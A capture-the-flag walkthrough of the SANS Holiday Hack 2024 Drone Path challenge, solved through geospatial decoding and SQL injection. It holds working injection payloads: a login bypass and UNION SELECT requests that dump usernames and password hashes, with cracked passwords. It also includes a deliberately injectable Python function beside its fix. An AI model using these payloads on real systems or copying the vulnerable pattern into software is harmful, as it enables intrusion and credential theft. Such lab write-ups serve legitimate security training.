Monday, November 25, 2024

SANS: Holiday Hack 2024: Act 2: Drone Path Terminal

Drone Path

Silver

This terminal is near Chimney Scissorsticks in the game.

Hey. Psst, over here. Hey, I'm Chimney Scissorsticks.

I'm not liking all the tension brewing between the factions, so even though I agreed with how Wombley was handling things, I get the feeling this is going to end poorly for everyone. So I'm trying to get this data to Alabaster's side. Can you help?

Wombley's planning something BIG in that toy factory. He's not really making toys in there. He's building an armada of drones!

They're packed with valuable data from the elves working on the project. I think they hide the admin password in the drone flight logs. We need to crack this to prevent this escalating snowball showdown.

You'll be working with KML files, tracking drone flight paths. Intriguing, right? We need every detail to prepare for what’s ahead!

Use tools like Google Earth and some Python scripting to decode the hidden passwords and codewords locked in those files.

Ready to give it a go? It’s going to be a wild ride, and your skills might just turn the tide of this conflict!

The Elf Drone Workshop Terminal goes here: Elf Drone Workshop

When first accessing the Terminal:

Welcome to the Elf Drone Workshop!  Upload your drone logs for other analysts to analyze!  Our elves are working around the clock to get toys ready for Santa's sleigh.  Only verified pilots have access to the logs so remember to authenticate yourself.  

There's a drop-down Menu at the top right.  This menu has the following options: Login, FileShare, and Home.  

If the browser window is minimized, the navigation is slightly different: after clicking the 3 lines menu at the top right, there's a dropdown Menu that appears on the left instead.  

Go to the FileShare menu option and download the file.  

Many challenges have a SQL injection component.

Select the Login option and try Username: ' OR 1=1 -- and Password: abc

It appears as though this site is vulnerable to SQL injection, because the injection above causes a successful login.  The menu options changed.  Now they are Home, FileShare, Workshop, Profile, Admin Console, and Logout.  Check to see if there are other files available in the file share.  There aren't.  Look at the Profile menu option.  Nothing interesting there.  Admin Console requires a code.  The Workshop page looks kind of interesting: Elf Drone Workshop: Search for a Drone.  Then there's a textbox with a Search button.  Below that it displays "Drone Details".  Since it's the same developer that made the login screen, it could potentially be vulnerable to SQL injection as well.  Enter ' OR 1=1 -- in the search bar.  It outputs the following.

  • Name: ELF-HAWK, Quantity: 40, Weapons: Snowball-launcher
  • Name: Pigeon-Lookalike-v4, Quantity: 20, Weapons: Surveillance Camera
  • Name: FlyingZoomer, Quantity: 4, Weapons: Snowball-Dropper
  • Name: Zapper, Quantity: 5, Weapons: CarrotSpike

Comments for Zapper

  • This is sort of primitive, but it works!

Looking at the traffic, it goes here to do that:

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=%27%20OR%201=1

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1

What if we change the query?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 1 -- 

The output is: []

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 2 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 3 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 4 -- 

Error Message

This table has three columns.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    },
    {
        "name": "ELF-HAWK",
        "quantity": "40",
        "weapons": "Snowball-launcher"
    },
    {
        "name": "FlyingZoomer",
        "quantity": "4",
        "weapons": "Snowball-Dropper"
    },
    {
        "name": "Pigeon-Lookalike-v4",
        "quantity": "20",
        "weapons": "Surveillance Camera"
    },
    {
        "name": "Zapper",
        "quantity": "5",
        "weapons": "CarrotSpike"
    }
]

Get rid of extra output we don't need.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Is there a users table?  Notice there is no space between users and the --.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null from users-- 

This output means there is a users table.  If there weren't, an error would be returned.

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Testing to see what can be added to each field.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT 1,null,null from users-- 

[
    {
        "name": 1,
        "quantity": null,
        "weapons": null
    }
]

1 is allowed in the first field.  Will it accept a username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT username,null,null from users-- 

Error message, so no, it won't allow username.

What about the second field?  Will it allow the username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,username,null from users--

Yup.

[
    {
        "name": 1,
        "quantity": "brynne",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "filo",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "fritjolf",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "lira",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "pip",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "sprigg",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "tylwen",
        "weapons": null
    }
]

What about passwords?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,password,null from users--

Yes it will. >:)

[
    {
        "name": 1,
        "quantity": "2bb7ab7713cc012f02eb03c95f6e4443",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "2fd03c8ea542a7fd85ca4ebbcc13d5ca",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "3c3a4f722ec77c1712941003443a4d83",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "4f7f1b7c49fa2b0cc22e2d2599f1f2e5",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "9eb6c13b1b18bc785ffb84d977bf5499",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "b9af6f935826ae1a89ecba72476fbcba",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "e54efff9e6258bef3eb35f093e3bae00",
        "weapons": null
    }
]

Looking at the hashes, only two show up as being cracked in online crackers: GUMDROP1 and RumbleInTheJungle.

Trying those passwords for the users:

fritjolf: GUMDROP1
pip: RumbleInTheJungle
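The Workshop search above broke because the search term was spliced into the SQL text.  Here is an added example (my own, not the challenge's code) that models that endpoint in SQLite with the vulnerable handler next to the parameterized fix; the table names and columns are assumed from the JSON responses above, and the password values are placeholders.

```python
"""Model of the injectable Workshop search, beside the parameterized fix.

Added example, not the challenge's own code.  It assumes a drones table and
a users table with the column names visible in the JSON responses; row
values are copied from the page except the password hashes, which are
placeholders.  The vulnerable function splices the search term into the SQL
text, so the ' OR 1=1 -- input rewrites the WHERE clause; the safe function
binds it as a parameter, so the same text is just a name matching no drone.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE drones(name TEXT, quantity TEXT, weapons TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO drones VALUES ('ELF-HAWK', '40', 'Snowball-launcher'),
                                  ('Zapper', '5', 'CarrotSpike');
        INSERT INTO users VALUES ('fritjolf', '<hash-placeholder>'),
                                 ('pip', '<hash-placeholder>');
        """
    )
    return conn


def search_drones_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """BUG (deliberate): the search term becomes part of the statement text."""
    sql = f"SELECT name, quantity, weapons FROM drones WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_drones_safe(conn: sqlite3.Connection, term: str) -> list:
    """FIX: the term travels as a bound value; quotes and -- stay data."""
    sql = "SELECT name, quantity, weapons FROM drones WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR 1=1 -- "
    print("vulnerable:", search_drones_vulnerable(db, probe))  # every drone
    print("parameterized:", search_drones_safe(db, probe))    # []
```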

Alternatively, the file in the file share can be downloaded and opened in Google Earth.  The flight path in that KML file spells out GUMDROP1.

Log in as fritjolf.  The file share still shows the same file.  However, in this profile there's a different file.

Note to self, remember drone name, it is the same location as secret snowball warehouses /files/secret/Preparations-drone-name.csv

Go to https://hhc24-dronepath.holidayhackchallenge.com/files/secret/Preparations-drone-name.csv

Download the file. (I already knew the name given that through the SQL injection, the drone name is called Elf-Hawk.  I downloaded that file already.  I didn't know that that's what this was alluding to though because I didn't follow the intended path to solve this one.)

Import the Preparations-drone-name.csv file into Google Earth.  Google has a nice wizard that assists with importing it.  The file is delimited by commas and the encoding is UTF-8; then check the rows/columns at the bottom to make sure they look OK.  Click Next.

Then tell it the latitude and longitude fields, which are OSD.latitude and OSD.longitude respectively.  Click Finish.  It will ask if a template should be applied.  Click No.

This will load the data in.  On the left-hand side under Temporary Places, it will display Preparations-drone-name.csv.  Check the box next to it, and the points will show up on the globe.

At first, there doesn't seem to be a discernible pattern.  However, clicking on each point in the left-hand navigation bar and looking at the landmarks shows letters.  For example, at the first point there are trees that look like the letter E.  At the second point there are trees or bushes that look like the letter L.  Keep looking at all the points, and eventually they spell out "ELF-HAWK".

Try the same SQL injection on the Workshop page, just in case fritjolf could see different things.  Logged into pip and looked at their pages as well.  Neither one of them had access to the Admin Console without a code.

Look at the comments for all the drones.  The important comments seem to be:

Comments for Pigeon-Lookalike-v4

This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Drone Details
These drones will work great to find Alabasters snowball warehouses. I have hid the activation code in the dataset ELF-HAWK-dump.csv. We need to keep it safe, for now it's under /files/secret.
We need to make sure we have enough of these drones ready for the upcoming operation. Well done on hiding the activation code in the dataset. If anyone finds it, it will take them a LONG time or forever to carve the data out, preferably the LATTER.

Open up ELF-HAWK-dump.csv in Google Earth Pro.  Unfortunately, on a globe, it doesn't really make much sense.  The hint about LONG and LATTER seems to refer to longitude and latitude.  Maybe mapping those on a 2D plane would work?  

There's a tool for working with Geographic Information called QGIS, which runs on Windows.  https://www.qgis.org/download/

In QGIS, go to Layer>Add Layer>Add Delimited Text Layer.  In the File Name, add the csv.  Encoding should be UTF-8.  In the File format, make sure the CSV radio is set.  In Geometry Coordinates, make sure the Point Coordinates are set correctly: Latitude: OSD Latitude and Longitude: OSD Longitude.  Geometry CRS should be set to Project CRS: EPSG:4326 - WGS 84.  Click Add.

Immediately after Add is clicked, a phrase appears: DroneDataAnalystExpertMedal.

Add this word to the badge for the Drone Path Terminal.

Silver Medal Achieved.

Gold

The path to the gold medal was given in the comments for the drones.

Comments for Pigeon-Lookalike-v4

This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Looking at the data in the ELF-HAWK-dump.csv, there are a lot of fields with TRUE and FALSE.  The comment mentions 'carvers', which likely indicates carving out the TRUE/FALSE data.  When thinking of TRUE/FALSE, 1/0 comes to mind, which is associated with binary.  That means there's binary data hidden in the csv.

Uploading the csv to CyberChef, it's possible to carve out this data.  The recipe is the following:

https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','TRUE%7CFALSE',true,true,false,true,false,false,'List%20matches')Remove_whitespace(true,true,true,true,true,true)Find_/_Replace(%7B'option':'Regex','string':'TRUE'%7D,'1',true,true,false,false)Find_/_Replace(%7B'option':'Regex','string':'FALSE'%7D,'0',true,true,false,false)Remove_whitespace(true,true,true,true,true,false)From_Binary('Space',8)

Upload the ELF-HAWK-dump.csv file into CyberChef as input with that recipe.

Once that is done, the output shows an ASCII art picture of a drone and the words CODEWORD=EXPERTTURKEYCARVERMEDAL.
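The same carving can be done with a few lines of Python instead of CyberChef.  This is an added example (mine, not from the challenge): it collects every TRUE/FALSE token in file order, maps them to 1/0 and decodes 8-bit ASCII.  The sample CSV is constructed so it runs offline; only the OSD.latitude/OSD.longitude column names come from the page, the flag column names are invented.

```python
"""Carve the TRUE/FALSE bits out of a drone CSV dump, in Python.

Added example, not from the write-up or the challenge: it does in Python
what the CyberChef recipe does.  Every TRUE/FALSE token is collected in
file order, mapped to 1/0, and the bit string is decoded as 8-bit ASCII.
The sample CSV is constructed here so the script runs offline; the real
ELF-HAWK-dump.csv is assumed to carry its message in boolean columns mixed
with telemetry columns such as OSD.latitude and OSD.longitude.
"""
import re

# Same pattern as the CyberChef recipe: bare TRUE/FALSE tokens anywhere in the text
BOOL_TOKEN = re.compile(r"TRUE|FALSE")


def carve_bools(text: str) -> bytes:
    """Decode TRUE/FALSE tokens as 1/0 bits, 8 bits per byte, in file order."""
    bits = "".join("1" if tok == "TRUE" else "0" for tok in BOOL_TOKEN.findall(text))
    usable = len(bits) - len(bits) % 8          # drop a trailing partial byte
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def build_sample_csv(message: str, bools_per_row: int = 4) -> str:
    """Construct a telemetry-like CSV whose boolean columns spell `message`.

    The flag column names are invented; only OSD.latitude/OSD.longitude
    are taken from the page.
    """
    bits = "".join(f"{b:08b}" for b in message.encode("ascii"))
    flag_names = ",".join(f"flag{k}" for k in range(1, bools_per_row + 1))
    rows = [f"OSD.latitude,OSD.longitude,{flag_names}"]
    for i in range(0, len(bits), bools_per_row):
        chunk = bits[i:i + bools_per_row]
        flags = ",".join("TRUE" if c == "1" else "FALSE" for c in chunk)
        rows.append(f"{45.0 + i / 1000:.4f},{-93.0 - i / 1000:.4f},{flags}")
    return "\n".join(rows) + "\n"


if __name__ == "__main__":
    import sys
    # Usage: python carve.py ELF-HAWK-dump.csv  (no argument: decode the constructed sample)
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else build_sample_csv("CODEWORD=TEST")
    print(carve_bools(data).decode("ascii", errors="replace"))
```

Like the CyberChef recipe, it matches the literal words TRUE and FALSE anywhere in the file, so a header containing those substrings would add stray bits.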

Add this phrase to the badge for the Drone Path Terminal.

Gold Medal Achieved.
